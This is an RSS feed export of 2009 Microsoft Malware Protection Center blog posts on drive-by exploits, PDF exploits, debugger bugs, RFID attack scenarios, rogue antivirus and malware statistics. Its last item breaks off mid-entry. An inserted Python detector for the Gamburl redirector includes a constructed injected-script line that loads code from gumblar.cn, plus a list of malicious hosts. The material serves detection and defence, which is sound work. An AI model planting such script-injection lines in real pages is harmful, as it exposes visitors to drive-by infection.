The known exploits are a typical drive-by attack scenario, as shown in the following diagram: users, upon visiting a specially constructed web page that invokes the vulnerable media plug-in, will encounter exploit shellcode, which further executes and downloads additional malware to the infected machines. Intending to bypass antimalware protection, malware binaries are encrypted in the download data stream. New dog, same old tricks. To wrap up the attack scene, under the cover of the new exploits are the old, long-lived online-game password stealers: PWS:Win32/Wowsteal.AP drops PWS:Win32/Wowsteal.AP!dll; TrojanDropper:Win32/Dozmot.C drops PWS:Win32/Dozmot.C and VirTool:WinNT/Dozmot.A; TrojanSpy:Win32/Lydra.AE. We recommend you revisit these security tips during your online and gaming adventures. As usual, be cautious when visiting web sites and opening movie files from untrusted sources, and make sure your antivirus software is up to date. Microsoft will release a security update for this issue, and once that happens, install it immediately. -- Lena Lin, Cristian Craioveanu, Josh Phillips and Patrick Nolan</description><link>http://www.secuobs.com/revue/news/113919.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/113919.shtml</guid></item>
<item><title>Microsoft Security Essentials Beta Announced</title><description>Secuobs.com : 2009-06-24 04:14:08 - Microsoft Malware Protection Center - Microsoft Security Essentials is a new, no-cost, anti-malware solution for genuine Windows PC consumers that provides real-time protection against viruses, spyware and other malicious threats. It is a lightweight, effective and modern anti-malware which runs on 32 bit and 64 bit Windows 7, Windows Vista and Windows XP SP2 and higher, and on modern consumer form-factors such as netbooks. A beta version of Microsoft Security Essentials v1.0 is available today for up to 75,000 consumers in a limited number of countries. You can find more details about the beta at the Microsoft Security Essentials website.
-- Microsoft Security Essentials Team</description><link>http://www.secuobs.com/revue/news/112918.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/112918.shtml</guid></item>
<item><title>PDF E-ducation</title><description>Secuobs.com : 2009-06-18 00:52:25 - Microsoft Malware Protection Center - Recently, Marian and Andrei presented a paper at the CARO Workshop about PDF vulnerabilities and exploits related to them. As we presented in our latest Security Intelligence Report, there was an increase in the use of these exploits, and the trend keeps going on. Since the beginning of the year, we have received over five thousand different samples taking advantage of various PDF vulnerabilities. Even though updates for these vulnerabilities are available, some for more than a year, people remain vulnerable despite having the solution at hand. And what is more important, the malicious samples work and people still get infected because they have not protected their systems as they should. The chart of the evolution by month shows how things keep trending up. An example of how an attack takes place would be like this: a website hosts a specially crafted PDF document, which contains the exploit code. Someone visits the page and the browser opens the PDF document, executing the PDF application in order to show its content. If the version of the PDF application in the user's system is vulnerable, the obfuscated exploit code (e.g. a variant of Win32/Pdfjsc) is executed and downloads an awful piece of malware. This downloaded malware can obviously change from a password stealer to any other specimen the bad guys want. Some of the cases we have seen include members of families like Win32/Vundo, Win32/Renos, etc. Nowadays, most applications have the option to update automatically. Let's take advantage of it and have a safer computer experience. For more information on how to update your Adobe software, visit the Adobe security bulletin page.
Andrei Saygo, Marian Radu and Enrique Gonzalez</description><link>http://www.secuobs.com/revue/news/110960.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110960.shtml</guid></item>
<item><title>Bugging the Debuggers</title><description>Secuobs.com : 2009-06-16 07:23:17 - Microsoft Malware Protection Center - No-one who knows what they're talking about would say that writing a debugger is easy. It's certainly made harder when the platform offers so many opportunities for things to go wrong. Here are two examples.
CreateToolhelp32Snapshot
This function was introduced to the Windows NT line in Windows 2000, though it existed as far back as Windows 95 in a separate DLL. On Windows NT-based systems, it calls into the ntdll.RtlQueryProcessDebugInformation function, which performs the majority of the work. Depending on the information that is requested, that function might insert into the process a thread that is used to gather that information about the process. This has the unintended consequence of resuming a suspended process. For example, calling CreateProcess(myfile.exe, CREATE_SUSPENDED) and then CreateToolhelp32Snapshot(myfile.exe pid) will cause myfile.exe to wake up and start running. If a debugger has attached to the process, then Windows will create another thread that executes a breakpoint on behalf of the debugger. The problem is that when the process wakes up, the debug breakpoint will execute before the debugger can call WaitForDebugEvent to intercept it. This will typically cause the process to crash, though there are ways to intercept this and continue to run, no longer under the control of the debugger. One debugger is known to misbehave as a result of this bug. Windows XP and later attempt to read from the process memory first. This attempt fails for a suspended process because it has not been completely initialised at that time. As a result, Windows XP and later do not create a new thread, so they do not demonstrate the problem.
CREATE_PROCESS_DEBUG_EVENT
When a process is started, a debugger typically wants to place a breakpoint at the main entrypoint. There are two common ways to locate this address. The first way is to query the EntryPoint field in the InMemoryOrderModuleList structure. Interestingly, we document this field as "unsupported", even though PSAPI.DLL uses it. The second way is to wait for the CREATE_PROCESS_DEBUG_EVENT event to occur, and then to query the lpStartAddress field in the CREATE_PROCESS_DEBUG_INFO structure. However, there is a problem with this second way. Windows has supported the relocation of EXE files since Windows 2000, though this fact has never been documented officially. With the introduction of Windows Vista and Address Space Layout Randomisation (ASLR), this "feature" came to be supported officially. As a result, a file can be loaded to an address other than the one that it requested. One case in particular is when the requested address is intentionally invalid, such as zero or above 2Gb. This causes Windows to load the file to 0x10000. So far, so good. The problem is that for such files, the value in the lpStartAddress field in the CREATE_PROCESS_DEBUG_INFO structure contains the "expected" and incorrect entrypoint value, which is calculated by summing the values from two PE header fields: ImageBase and AddressOfEntryPoint. A breakpoint that a debugger places there will not be hit. If the debugger then resumes the process, the process will run freely. One debugger is known to misbehave as a result of this bug. Such seemingly simple things, yet such potentially disastrous effects. That's why debugging malware is best left to the professionals. If you can't trust your debugger, whom can you trust?
- Peter Ferrie</description><link>http://www.secuobs.com/revue/news/110115.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/110115.shtml</guid></item>
<item><title>Radio-Frequency Identification devices, is infection a reality? Part 3 - Security</title><description>Secuobs.com : 2009-06-12 06:46:19 - Microsoft Malware Protection Center - So far, it seems that a number of known attacks on RFID devices can be generally sorted into three broad categories, that is:
* cloning an RFID tag,
* unauthorised modification of an RFID tag,
* using an RFID tag to mount an attack on an RFID back end application,
* attempting a blunt denial of service.
Continuing the biological virus analogy, an RFID tag can act as a carrier affected by a dormant infection, and the RFID protocol and radio waves can act as a transmission medium (say, like a fine mist of water that carries an airborne biological virus). In turn, an RFID reader is the port of entry for the infection and a computer connected to an affected RFID reader is thus susceptible to system infection.
If the traffic between the RFID reader and the tag is not encrypted, it appears that cloning a tag, in most cases, is a fairly straightforward procedure. An analogy can be made to a voice-activated security system, where recording the genuine request-response exchange would generally allow imitating the response any time the request for such a response is made. In the case of an RFID system, a device constructively similar to an RFID reader but more sensitive, with multiband capabilities and the ability to record and analyze recorded sessions, is placed close to an RFID tag during the exchange. The radio session is recorded, demodulated and stored for post processing. Once the response of an RFID tag is isolated, it can be played back to the reader, eventually retransmitting an exact copy of the response from a legitimate tag. The cloning is complete. Similarly, interrogating a tag with a predominantly known original reader request recorded earlier could activate a tag and allow recording of the transmitted tag's response away from the original reader. This allows cloning to occur simply by placing the session recording device in the operating proximity of the tag.
Would such a recording device be readily available to the general public? The answer is yes. The architecture of an RFID recorder would generally be based on a Software Defined Radio (SDR). This type of radio device was originally proposed for use by the military in the late 80's and early 90's and then made its way to the public sector for use in cell phone, medical and measuring equipment. The SDR samples the RF signal directly into the digital domain, allowing any post processing, including demodulation, decoding, and any signal transformations, to be done by software. This configuration is extremely flexible and allows the use of different protocols, encoding, decoding and modulation schemes. This is possible because all the necessary processing is done in the supporting software, leaving hardware modules intact. The advances in Very Large Scale Integrated (VLSI) chipsets and high frequency electronics have made SDR solutions affordable. A number of designs have been created and made available for reproduction by anyone who is generally versed in electronics. One such device has been designed specifically for RFID security studies by Jonathan Westhues (http://cq.cx/proxmark3.pl) and is referred to by numerous RFID hacking communities. Another SDR implementation, which is not specifically tailored for RFID needs but is extremely flexible since it has capabilities to cover beyond the HF band of 13 MHz, possibly including the 433 MHz, 865-956 MHz, and 2.45 GHz bands, is the collaborative work of several individuals and is currently being actively developed and supported (http://hpsdr.org/).
Is it possible to modify an RFID tag with some arbitrary information? Yes it is. Acting as an RFID reader and following a defined protocol, an SDR device can relatively easily modify information stored on a tag. It is also possible that an SDR device acting as a tag could simply present desired information to an RFID reader. This last method even works for tags which cannot be written to - the tag is simulated by an SDR device and the actual tag is not even needed. Several successful proofs of concept have already been reported.
Some RFID system configurations can loosely be looked at as user-input web-based processing systems. An RFID reader could be compared to a web page which requires some user input, and the tag can be related to the actual information provided by a user. Such a system may be susceptible to vulnerabilities targeting various layers of back end software. For instance, an application responsible for acquiring a user's input or processing it, or the database engine, or the decision making application layer could be susceptible. Most notoriously, it seems that some database engine vulnerabilities found to affect web based input systems could be directly applied and exploited, thus affecting an RFID system as well. It looks like most of the time the back end is similar, if not exactly the same, for both of these system configurations.
There's the possibility of crafting an attack where an exploit would allow the execution of malicious code stored on a tag. This could lead to an attacker gaining control of the back end infrastructure and possibly lead to the retrieval, loss or modification of sensitive information and costly down time. It is also possible to have such an attack propagate itself either through previously unaffected tags or by any other conventional means such as mass mailing, shared drives or any other removable media. Some basic proofs of concept have already been circulated through the web, and while they are still in their infancy and only work in a controlled lab environment, the development of such techniques might pose a real threat in the future.
Because of physical restrictions on the number of tags which can be placed in the proximity of an RFID reader, generally, most RFID systems are not robust enough to defend against input information overloads. Although certain algorithms exist which are used to process multiple tags placed in the proximity of the reader, such as walking a tree of tag IDs or a randomized poll for a bounced tag request, there are still a number of ways to disrupt an RFID service through RF interference. Creating interference on the carrier frequency of a reader will generally disrupt a radio frequency communication, affecting the quality of the modulated signal. Such an effect can be observed on a conventional radio when trying to tune to a weaker station which happens to share a carrier frequency with a more powerful station. Also, because of the automatic gain control of radio receivers, aimed at protecting their input circuits from signal overloads, the sensitivity of the receiver will be tuned down to accommodate the stronger signal, thus masking the weaker signal out.
In the case of encrypted RFID tags most of the attacks are not as trivial and require cryptanalysis in order to retrieve the key and the session's data. To make it somewhat viable could require substantial computer power. Because of the cost restrictions associated with tags, which affect their computational abilities, the key length is kept low, usually in the vicinity of 40 bits, and the encryption algorithm is generally kept obscure in the hope of thwarting cryptanalysis. But using obscure encryption algorithms unfortunately, most of the time, works to the advantage of an attacker. Unknown or specifically tailored encryption algorithms are unlikely to have been tested by the broader cryptanalyst community. Often, when these algorithms are later exposed, they are discovered to be weak or may contain flaws which can be exploited.
It appears that in most of these case scenarios the security aspect of RFID designs is still a tradeoff between the cost of implementation or replacement, and the probability of attacks carried out on any particular RFID solution. A practice which may be acceptable today might become very costly in terms of down time and data loss once RFID solutions become widely adopted by industries and economically lucrative to attackers.
There are certain steps which might be taken to fortify RFID security:
* Keep RFID tags RF shielded or disabled until actual use with the reader, essentially limiting exposure of the tag to the possibility of cloning or a cipher attack.
* Use proven encryption algorithms - it is viable in the long run, despite the cost, to have all access control tags encrypted using proven encryption algorithms with larger keys (DES, RSA and so forth). While it might keep you at a door for a bit longer during an authentication process, it is definitely worth it, considering the potential toll of a security breach.
* Use a testing platform utilizing the SDR devices mentioned above to assess different configurations and possible security issues associated with an RFID solution - why wait until someone else uncovers and possibly uses a vulnerability in your design?
* Provide robust input validation. This is the first and very important line of defense against vulnerabilities.
* If security is paramount, combine RFID solutions with other means of access control, for instance biometric.
* Have an RF SDR scanner listening in on a tag-reader exchange and validating the data and protocol according to its internal database. Having a database of known attacks against such a configuration can act as an RFID intrusion detection system, and possibly block off malicious tags.
While the technology may be relatively novel, its adoption by various industries should be considered with security in mind.
--Oleg Petrovsky</description><link>http://www.secuobs.com/revue/news/108917.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/108917.shtml</guid></item>
<item><title>Internet Antivirus Pro is unable to detect any real malware</title><description>Secuobs.com : 2009-06-09 21:17:58 - Microsoft Malware Protection Center - This month, MSRT takes on another prevalent rogue family. This one is called Win32/InternetAntivirus and, although it has dabbled with the names General Antivirus and Personal Antivirus*, it is usually easy to recognise by the moniker Internet Antivirus Pro.
[Win32/InternetAntivirus screenshot]
Win32/InternetAntivirus follows the familiar path of a fake online scanner leading to the rogue downloader, which in turn installs the rogue itself. The online scanner looks like this:
[Win32/InternetAntivirus fake online scanner]
The rogue downloader that these pages want you to run also downloads a password stealer called TrojanSpy:Win32/Chadem. Win32/Chadem tries to grab FTP usernames and passwords that the rogue creators can then use to compromise servers in order to host more malware. They use new domain names every day, often registering multiple names at a time, like scanfan4.info, star4scan.info and scanstar4.info. Win32/InternetAntivirus also installs a component to display messages in your browser, similar to the combination of Win32/FakeXPA and Win32/Yektel. And it displays a bogus Windows Security Center, which reports that Internet Antivirus Pro is "unable" (sic).
[Win32/InternetAntivirus fake Security Center]
This is all pretty normal rogue behaviour these days. As always, only use security software that has been tested by a trusted third party. Read this or the latest Security Intelligence Report (SIR) for more details on what to look out for.
-- Hamish O'Dea
* Not to be confused with Win32/FakeXPA, which also currently misuses the name Personal Antivirus.</description><link>http://www.secuobs.com/revue/news/107611.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/107611.shtml</guid></item>
<item><title>Radio-Frequency Identification devices, is infection a reality? Part 2 - Hardware</title><description>Secuobs.com : 2009-06-06 03:03:25 - Microsoft Malware Protection Center - An RFID system is based around a reader and a tag. A tag stores information, whereas an RFID reader retrieves or modifies information stored on the tag. To transmit this information through the air, both devices use high frequency electric current oscillations (the frequency of such current oscillations is also known as radio frequency or RF) which, when applied to a piece of wire referred to as an antenna, have a tendency to extend themselves well beyond the actual antenna wire boundary in the form of electromagnetic waves. Such waves consist of two parts: magnetic and electric. Each of these contributing parts has an area of influence which depends on the distance from the emitting antenna. Another important feature of the waves is their ability to induce electric charge or current in a conductor placed in the path of such wave propagation. If a tag is placed in the path of an electromagnetic wave emitted by a reader, there will most certainly be electric current induced in the tag's antenna. Also, the direction of propagation can be roughly controlled by the shape of the emitting antenna, although in reality waves tend to scatter among a multitude of directions.
Here's an oversimplified but basically functional schema of an RFID system (Fig. 1).
Fig. 1
To pass information from the reader to the tag and back, the RF waves are controlled, or as it is custom to say, modulated, with a much lower frequency of actual data transmission. A variety of modulation schemes exist, but most commonly they are based on the control of the electromagnetic waves' properties: amplitude, frequency and phase. The modulation schemes employed in RFID are designed to be the most useful in digital transmissions, meaning that such modulations encode only two states, interpreted as '0' and '1'. These modulation schemes are called ASK (amplitude shift keying), FSK (frequency shift keying) and PSK (phase shift keying). A simplified overview can be seen in the following examples. Imagine we need to encode 101010 (this number is chosen as a good illustration of modulation for the purposes of our example).
Fig. 2
As can be seen from Fig. 2, a '1' or a '0' state is represented by intermittently changing one of the wave's properties: the amplitude, frequency or phase. It is worth noting that the frequency of the electromagnetic wave which is subjected to modulation is normally called a base frequency.
Modulation and demodulation of the carrier frequency normally adds to the computational load for a reader or a tag. Also, with the advent of specialized hardware bases for RFIDs, there's a tendency to shift RF functions away from the main processing unit within a tag or a reader and incorporate them as functionally complete modules within a specialized integrated circuit. Such higher circuit integration essentially frees the CPU to conduct more computationally intensive encryption algorithms. To distinguish between varieties of RFID devices and to make sure they best suit their dedicated purposes, there are a number of standard protocols defined for an RFID tag and reader exchange. These protocols differ by occupied bandwidth, carrier frequency, proximity of operation, amount and type of data exchanged, and the type of coupling between the reader's and the tag's antennas.
So far there are a number of carrier frequencies which are used for RFID protocols. The frequencies in the range of 125-135 KHz are often used for pet and human tag implants as well as for some security access systems, such as car immobilizers and secured perimeters. The range of a reader-tag interrogation is mostly limited to 0.5 meters (around 1.6 feet). The bit rate of communication is comparatively slow (less than 1 kbps) and the bit traffic is normally not encrypted. In most cases tags are passive, meaning that they feed off a magnetic field created by the reader. These passive tags are often quite simple in implementation and tend to use backscatter propagation, basically reflecting the signal emitted by the reader in a certain way based on a configuration of the tag's reflective surface. Once received, a reader analyzes the signal's waveform to make a decision about the validity of the tag. Such technology is not new; quite similar techniques are used in radar or sonar applications to identify basic target shapes, for instance.
There are also some carrier frequencies allocated around 13.56 MHz, 433 MHz, 865-956 MHz and 2.45 GHz. The carrier frequency, generally, affects the proximity of operation as well as the amount of information it can carry when modulated, hence the used bandwidth and the speed of data exchange. Of interest, 13.56 MHz is becoming increasingly popular. Because this frequency is fairly low, it allows inexpensive RF designs for a reader and a tag, and at the same time provides an increased bandwidth for communication when compared to lower base frequencies such as 125-135 KHz.
Peering inside a modern reader or a tag we can usually spot a number of basic blocks.
Fig. 3
Data from a control application, formalized by the CPU (Central Processing Unit) according to an RFID protocol, is passed to a DSP (Digital Signal Processor) where it is functionally transformed following the modulation and encoding schema. The byte stream then follows to a DAC (Digital to Analogue Converter). The DAC converts digital information to its analogue representation (where, for instance, digits correspond to an analogue parameter, say voltage) and passes it to an RF amplifier. The commutator controls the signal flow in and out of the antenna. The received signal follows the reverse path, where it is digitized by the ADC (analogue to digital converter) and then demodulated and decoded by the DSP. Note that the schematic of the module shown in Fig. 3 is greatly simplified, but even at its most basic it shows a modern approach to the design and implementation of RFID transceiver modules which heavily rely on digital post processing - while it is somewhat more expensive for design and manufacture, it is extremely flexible. This architecture can adapt to changes in modulation, encoding and RFID protocol by utilizing different software or firmware. It avoids costly hardware redesigns and remanufacturing and leads to greater encapsulation of RFID protocols from the controlling application.
While it is desirable to follow the digital signal processing approach when designing RFID infrastructure, in the case of RFID tags it is not always possible or viable. For successful adoption of RFID technology it is imperative that the price of RFID tags stay low. This factor limits the computational power available to a microcontroller for the DSP implementation. Most of the time DSP is sacrificed in favor of hardwired analogue logic which cannot be changed to reflect the adoption of newer standards.
The basic blocks of a tag include a CPU, memory, RF transceiver, modulator (MOD), demodulator (DEM) and antenna.
Fig. 4
There are many variations in RFID tag implementations. For instance, there are tags which use only the geometric properties of their piezoelectric surfaces to resonate in response to the signal transmitted by the RFID reader. The geometric configuration of the resonating RFID tag membrane imprints a distinct signature on the reflected RF signal. While the cost of such tags is extremely attractive, their use is very limited and overall such a solution might not be as cost effective and as generally adopted as the rewritable tag pictured in Fig. 4.
There's no doubt that RFID solutions are convenient, viable and provide flexibility to access control, payment and tracking infrastructures. There are a number of pilot programs run by some big retail chains where RFID tags replace UPC barcodes. There are toll payment systems in the US and elsewhere that have been utilizing RFID tags for some time. In recent years we've seen the introduction of RFID passports by some European and Asian countries. There also seems to be a wide application of RFID tags implanted in pets, helping to track a stray pet and return it to its owner.
The adoption of RFID tag technologies by industries is on the rise. According to IDTechEX, it is expected that the RFID market will grow from 5 billion measured in 2008 to an estimated 25 billion in 2018. Where does it leave us in terms of RFID security? Should we be more concerned and more prepared with all the facts currently at hand? You'll have to read part 3 of this series on RFID security.
--Oleg Petrovsky</description><link>http://www.secuobs.com/revue/news/106448.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/106448.shtml</guid></item>
<item><title>Radio-Frequency Identification devices, is infection a reality? Part 1</title><description>Secuobs.com : 2009-05-29 02:14:51 - Microsoft Malware Protection Center - Most people would be aware that biological viruses can be airborne, and can spread in this manner. For instance, a common flu virus is able to survive in a fine mist of water droplets suspended in mid air until it lands on the next host. Luckily, not all viruses are created the same - some can't "fly", some "fly" but can't "land", some land but can't reattach themselves to a host. Interestingly enough, the same analogy persists in the realm of computer viruses. Would my computer or a smart device get infected if I came close to an infected laptop or a PDA? Continuing the analogy from the biological world, it depends on the ability of an already-infected system to deploy viruses into the common medium for transmission (air in our case), the host's defences against such an attack, and the ability of the virus to penetrate those defences. Technically speaking, if a virus broadcasts itself utilising a wireless data transfer protocol and another system accepts this transmission and transfers control to the received data, then we may have a case of an "airborne" infection. The most plausible case scenario might include a virus that utilises a vulnerability in the driver of a wireless device or a service using either TCP/IP or Bluetooth protocols. However, despite the growing numbers of wireless devices, including smart phones, PDAs and 2G, 2.5G, 3G and GPRS network services, so far we've been fortunate to not have outbreaks of this nature. Perhaps this 'good fortune' can be ascribed to several factors, including the diversity of wireless platforms, drivers, and services, which limits the possibility of replication, as well as the prevalence of security measures aimed at plugging holes exposed by vulnerabilities.
The situation is a bit different with common Radio-Frequency Identification (RFID) devices. We use them every day - some of us without even realizing it. For instance, books or DVDs in some libraries have RFID tags that are scanned when they go in and out of a library database. We are granted access to offices and restricted premises using RFID badges. Some supermarkets and warehouses have run pilot programs to track and scan goods using RFID tags. Many countries have started using RFID for admittance to public transport, toll roads and passport control. Since 1998 ExxonMobil has been using RFID for fast transactions at the pump. The use of and demand for RFID technologies is increasing.
At a basic level we have two devices: an RFID tag and an RFID scanner. When an RFID tag comes within close proximity of the RFID scanner, the scanner reads and processes information from the tag. A tag can be active or passive - that mostly means either the presence or absence of an internal power source. If there's no internal power source, RFIDs use a wire coil which picks up electromagnetic energy from a reader. The tag can be read or written to. The tag could store identification information, as well as arbitrary information, acting as a portable storage device used by a service application in any way it finds useful. For instance, a tracking system can update a tag on a package when it passes certain check points.
At a hardware level an RFID tag normally consists of a receiver, a transmitter, and a micro-controller which facilitates the exchange. The RFID sensor, or reader/writer, is pretty much the same, except perhaps the transceiver is a bit more powerful and the micro-controller usually has more processing power than an RFID tag. Normally, information stored on the tag has to be authenticated to prevent counterfeiting, but because tags are thought of most often as a disposable device with the cost of manufacturing kept low, generally RFID tag micro-controllers are not powerful enough to employ sophisticated means of robust real time encryption and are susceptible to attacks.
Most of the time an RFID reader is connected to some sort of database software to process data received from the tag. Once the tag is compromised it further opens possibilities for various scenarios of security breaches. For instance, using an SQL injection vulnerability technique one may be able to force the system to run a stored procedure or malicious binary code inside a database engine, which in turn can write code back to each passing tag, hence aiding in the propagation of the attack. In a succession of several blogs I'd like to explore the features and various standards of RFID devices and their security - perhaps going under the hood of the most common hardware and software configurations.
--Oleg Petrovsky</description><link>http://www.secuobs.com/revue/news/102847.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/102847.shtml</guid></item>
<item><title>Gamburl Gone Wild</title><description>Secuobs.com : 2009-05-28 00:07:18 - Microsoft Malware Protection Center -

We're seeing plenty of reports for a JavaScript redirector malware family that we call Gamburl; previous reports have called it Gumblar or Redir. These attacks seem to be coming from legitimate Web sites with pages that have been modified to contain this malicious script. So even if you're visiting a Web site that you trust, there's still the possibility that you may be a victim of these so-called "drive-by attacks".

When a user visits a site containing a Gamburl script, the browser will be redirected to a specific Web site that contains a slew of exploits and other malware. As of this writing, Gamburl is known to redirect to the following Web sites:

gumblar.cn
martuz.cn

Once connected to the above sites, Gamburl tries to download other malware onto the system. From what we have observed, this malware is mostly backdoors, PDF and Shockwave exploits. However, some of the observed downloaded malware are variants of the Win32/Daonol family. Examples of Daonol MD5s seen are 7de29e5e10adc5d90296785c89aeabce and 2131112053ed144c46277b9024bcf39f. Daonol trojans are capable of preventing access to security Web sites and of redirecting searches to sites hosting other malware. Daonol is also capable of stealing information, such as FTP credentials, and placing the information in a file in the Windows system folder called sqlsodbc.chm. Note that a file named sqlsodbc.chm exists by default when you install Windows, and so it is overwritten if your system has been infected by Daonol. A modified sqlsodbc.chm may therefore be a symptom of Gamburl/Daonol infection. In case you suspect infection, you might want to compare the file against the list of unique hashes and file sizes of a clean sqlsodbc.chm (Hash / File Size; the table itself is not included in this feed entry). Users should also note that whatever malware is being served can be changed by the malware authors at any time.

JavaScript source code

This is a screenshot of part of the Gamburl code. It attempts to determine the script engine version of the browser being used. Based on this information, the malicious site could serve a variety of targeted exploits.

As always, we recommend that you use antivirus software and make sure that you have the latest signatures. Microsoft antivirus customers are currently protected against the Gamburl family with the detections Trojan:JS/Gamburl.A and Trojan:JS/Gamburl.gen!A. Because this threat also makes use of a lot of exploits for other applications, we would also like to remind users to always update all their software to the latest versions.

Thanks to Jonathan Poon and Ian McMillan for providing us information regarding sqlsodbc.chm.

- Elda Dimakiling and Jireh Sanico

IMAGE</description><link>http://www.secuobs.com/revue/news/102307.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/102307.shtml</guid></item>
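The following Python script is an added example, not code from the MMPC post or from Gamburl itself. It performs two of the checks the post describes: it scans page source for references to the two redirect hosts named above (after URL-decoding, because injected scripts commonly wrap their markup in unescape()) and for the JScript calls a script would use to read the script engine version, and it compares sqlsodbc.chm against a known-good (MD5, size) table supplied by the caller, since the post's table is not reproduced in this feed entry. The sample page fragment, the engine-probe heuristic and the default file path are assumptions made for the example.

```python
import hashlib
import os
import re
from urllib.parse import unquote

# Redirect hosts named in the post; matched case-insensitively after URL-decoding.
GAMBURL_HOSTS = ("gumblar.cn", "martuz.cn")

# JScript's engine-version functions. Flagging them is a heuristic assumed for this
# example: the post says the script reads the script engine version but shows only a
# screenshot, so the exact calls it makes are not known here.
ENGINE_PROBE_RE = re.compile(r"ScriptEngine(Major|Minor|Build)?Version\s*\(", re.I)

# Default location of the file Daonol overwrites (assumed: the "Windows system folder").
SQLSODBC_PATH = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"),
                             "system32", "sqlsodbc.chm")

# Constructed page fragment in the style of an injected script; not a real sample.
# The %xx escapes hide both the markup and part of the host name from a plain grep.
SAMPLE_INJECTED = (
    'var v = ScriptEngineMajorVersion() + "." + ScriptEngineMinorVersion();\n'
    'document.write(unescape("%3Cscript src=%27http://%67umblar.cn/%27%3E%3C/script%3E"));\n'
)


def scan_page(text):
    """Return the Gamburl indicators present in one page's source."""
    decoded = unquote(text).lower()
    hosts = sorted(h for h in GAMBURL_HOSTS if h in decoded)
    return {"redirect_hosts": hosts,
            "engine_probe": ENGINE_PROBE_RE.search(decoded) is not None}


def scan_tree(root, suffixes=(".html", ".htm", ".php", ".js")):
    """Walk a web root and report every file carrying at least one indicator."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                result = scan_page(fh.read())
            if result["redirect_hosts"] or result["engine_probe"]:
                hits.append((path, result))
    return hits


def check_sqlsodbc(known_good, path=SQLSODBC_PATH):
    """Compare sqlsodbc.chm with clean (md5, size) pairs; Daonol overwrites the file."""
    with open(path, "rb") as fh:
        data = fh.read()
    fingerprint = (hashlib.md5(data).hexdigest(), len(data))
    return "clean" if fingerprint in known_good else "modified"


if __name__ == "__main__":
    print(scan_page(SAMPLE_INJECTED))
```

Run scan_tree against a copy of the web root taken from the server, not the live site, and treat a modified sqlsodbc.chm as a trigger for a full scan rather than as proof by itself: the comparison only says the file is not the stock one.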
<item><title>860,000 Computers Cleaned from Password Stealer Infections in One Week</title><description>Secuobs.com : 2009-05-21 06:57:45 - Microsoft Malware Protection Center -

This month's MSRT shows the following top ten most prevalent threat families as of May 19. The newly added and blogged rogue family, Win32/Winwebsec, is ranked at #17 with 34,792 infected machines.

Family | Most Significant Category | Detections | Infected Machines | Ranking change
Win32/Taterf | Worms | 347,424 | 343,515 | =
Win32/Alureon | Miscellaneous Trojans | 256,998 | 248,341 | +
Win32/Frethog | Password Stealers and Monitoring Software | 96,922 | 95,581 | -
Win32/Bancos | Password Stealers and Monitoring Software | 97,389 | 92,565 | +
Win32/Koobface | Worms | 79,993 | 78,113 | +
Win32/Renos | Trojan Downloaders and Droppers | 76,304 | 75,118 | =
Win32/Cutwail | Trojan Downloaders and Droppers | 95,726 | 74,400 | -
Win32/Vundo | Miscellaneous Trojans | 67,322 | 65,233 | +
Win32/Virut | Viruses | 78,896 | 53,995 | +
Win32/Lolyda | Password Stealers and Monitoring Software | 54,871 | 51,050 | +

A few key takeaways from this telemetry:

* Out of the top 10 threat families, six moved higher in ranking compared to last month. Some of these six threat families, like Alureon and Vundo, have been around for more than two years, while others, like Koobface (refer to the recent MMPC Koobface blog), have only been seen in the ecosystem for several months. This indicates each threat has its own lifecycle, and it appears that sometimes malware authors are willing to reinvest in their existing distributions instead of moving on to something else.
* Three of the top 10 are password stealer threats. In fact there are five if you count the two worms, Taterf and Koobface, both of which have a critical payload of stealing user data. Or consider six: the Alureon trojan goes for users' password and credit information as well. Adding them together there are 859,842 machines infected by password stealer threats when we are only talking about the top 10 threats. Note this is not a direct sum, since some machines were infected by more than one of these threats.
* Renos continues to be high on the list and is a major distribution channel for fake antivirus programs.
* Cutwail drops slightly but stays in the top 10. This is a spambot that we've discussed in different venues, including in the recent Waledac blog.

So, not much of a surprise but worth taking note: identity theft, rogues and spammers highly occupy the top 10. Criminals are going after your wallet, especially in this recession time. Be safe. Make sure you have a firewall and an AV product installed on your system.

Scott Wu

IMAGE</description><link>http://www.secuobs.com/revue/news/99767.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/99767.shtml</guid></item>
<item><title>Recession, Music, and Wimad</title><description>Secuobs.com : 2009-05-16 05:34:22 - Microsoft Malware Protection Center -

Nowadays almost everyone is affected by the recession in one way or another. More and more people try to save money. Instead of buying licensed songs in CD form or from reputable online services, some people prefer to download songs via P2P or do a direct download from untrusted sites. This is a popular way of getting music files for free.

Wimad is a malware family that is known for using music files as its medium for distribution. It is a detection for malicious Windows Media files that encourage users to download and execute arbitrary files on an affected machine. When opened with Windows Media Player, Wimad files open a particular URL in a web browser and prompt the user to download a file. The accessed URLs and the downloaded files vary according to the Wimad variant, but some of the known detections for the downloaded files are Adware:Win32/PlayMp3z, TrojanDownloader:Win32/Tracur.A and Trojan:Win32/Nebuler.gen!D. In the wild, Wimad files have been observed with the extensions ASF, ASX, MP3, and WMA.

Below is a graph of the top 10 family detections for the last twelve months.

IMAGE

As you can see in the following graph, Wimad is the 7th family with the most reported detections.

IMAGE

Looking at Wimad's monthly detection report from May 2008 to April 2009, we can see an increase in detection, with an average of about 1.5M detections per month and a peak observed last December and January exceeding 2M.

IMAGE

Based on the geographic distribution of Wimad for the last year, the United States, Canada and the United Kingdom are the most affected countries.

As blogged before by our fellow researchers, the cost of free software might be too high. Time and time again we encourage users to support and patronize licensed media and software.

-- Francis Tan Seng and Elda Dimakiling

IMAGE</description><link>http://www.secuobs.com/revue/news/97059.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97059.shtml</guid></item>
<item><title>MSRT Tackles Another Rogue</title><description>Secuobs.com : 2009-05-14 14:24:52 - Microsoft Malware Protection Center -

